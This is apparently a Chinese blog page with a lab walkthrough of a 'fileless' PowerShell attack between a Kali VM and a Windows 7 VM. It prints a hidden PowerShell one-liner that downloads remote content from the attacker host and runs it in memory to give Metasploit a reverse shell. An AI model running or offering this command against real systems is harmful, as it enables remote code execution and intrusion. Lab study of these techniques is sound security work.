首页 > 系统相关 >【攻防技术系列+PowerShell】无文件落地攻击

【攻防技术系列+PowerShell】无文件落地攻击

时间:2024-07-19 11:56:20浏览次数:11  
标签:攻防 落地 win7 192.168 PowerShell MSF powershell

#红队 #MSF #powershell

虚拟机环境搭建:

【Kali】,192.168.10.131
【win7】,192.168.10.134

接上文:【攻防技术系列】MSF进程迁移,用的是里面的 1.exe

如果遇到端口占用情况,可以采用以下解决方案:

之后在【win7】中使用powershell执行以下命令,实现无文件落地攻击

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.10.131:8083/1.exe'))"

运行之后,cmd闪退,属于正常现象。

之后再【kali】中收到一条请求记录

同时,在MSF端成功收到反弹的shell

标签:攻防,落地,win7,192.168,PowerShell,MSF,powershell
From: https://www.cnblogs.com/o-O-oO/p/18311220

相关文章

  • 【解决方案】CMT2189D系列动能芯片成功量产落地智能马桶无线遥控方案
    自发电无线遥控设备,是将手按开关或按键产生的微量动能、通过能量采集模组转化为电能供给控制器工作,再把控制信号通过无线射频发射出去控制其他设备工作。能量采集转换模组目前主要有微型发电机(闭合导线去切割磁感线)和压电生电2种方式(如下图)。前者产生的电量较多、成本高,做成的......
  • 【攻防技术系列】shellcode免杀
    接上文:【攻防技术系列】shellcode初识二、shellcode简单免杀2.1什么是免杀?免杀技术全称为反杀毒技术(AntiAnti-Virus)简称“免杀“。它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,包含反汇编、逆向工程、系统漏洞等技术,所以难度很高。2.2......
  • 攻防世界WEB(新手模式)3-unserialize3
    进题目,可以发现这是一个反序列化的题目。这段代码定义了一个名为xctf的类,其中包含一个公共属性$flag,初始值为'111',并且定义了一个__wakeup()魔术方法。魔术方法__wakeup()__wakeup()方法在对象反序列化时被调用。这段代码中,当该类对象被反序列化时,将立即调用exit('badreq......
  • 攻防世界supersqli
    supersqliSQL注入的常规思路是判断注入点,尝试后发现注入点为’判断字符数量得出数量为2然后尝试联合注入发现select等字符被过滤,尝试堆叠注入-1';showdatabases;#猜测在supersqli的可能性会大一点(也可以挨个尝试)-1';usesupersqli;showtables;#查询具体表-......
  • Datawhale AI 夏令营 全球Deepfake攻防挑战赛
                    近日有学习多模态技术的需求,碰巧撞上Datawhale的夏令营,初看要求颇高,既要打卡还要分享,心中顿起燥心,转念一想,其实不失为一次磨练机会,为提高自己逃课摆烂的成本,邃开始撰写自己第一篇公开的学习笔记,若多日后看见虎头蛇尾的学习笔记,想必羞愧难当。......
  • Datawhale AI 夏令营 全球Deepfake攻防挑战赛 task2
    数天未见,进步如何?距第一篇笔记发布已过多日,在笔记中立下的flag推动下再次打开CSDN创作中心来记录学习进展。首先让我来对竞赛项目和datawhale提供的baseline做一个简单的梳理:balseline网址:https://www.kaggle.com/code/littlejian/deepfake-ffdv-baseline项目要求:判断一......
  • KU链接:如何在Linux作业系统上安装Azure PowerShell
    本文由KU链接вт989点сс原创编译,AzPowerShell模组是汇总模组。安装它会下载正式运作的AzPowerShell模组,并让其Cmdlet可供使用,本文说明如何在Linux上安装AzPowerShell模组。必要条件安装支援的PowerShell第7版或更新版本安装开启终端机或其他壳层主机应......
  • 在 PowerShell 中Get-WmiObject Win32_PhysicalMemory,SMBIOSMemoryType 是一种用于描
    在PowerShell中Get-WmiObjectWin32_PhysicalMemory,SMBIOSMemoryType是一种用于描述系统中物理内存类型的属性。数字26表示特定的内存类型,具体为DDR4内存。每种内存类型在SMBIOS(SystemManagementBIOS)规范中都有一个对应的数字码,用来标识不同类型的内存。以下是一些常见......
  • 【Powershell】超越限制:获取Azure AD登录日志
    你是否正在寻找一种方法来追踪AzureActiveDirectory(AzureAD)中用户的登录活动?如果是的话,查看AzureAD用户登录日志最简单的方法是使用MicrosoftEntra管理中心。打开https://entra.microsoft.com/,然后进入监视和健康状况->登录日志这里查看到的是全部用户的登录日......
  • 【攻防技术系列+权限维持】Linux隐藏技术
    #权限维持#Linux#隐藏一、隐藏文件二、隐藏文件时间戳三、隐藏权限四、隐藏历史操作五、隐藏端口六、隐藏进程一、隐藏文件创建一个隐藏文件:touch.test.txt一般的Linux下的隐藏目录使用命令ls-l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏......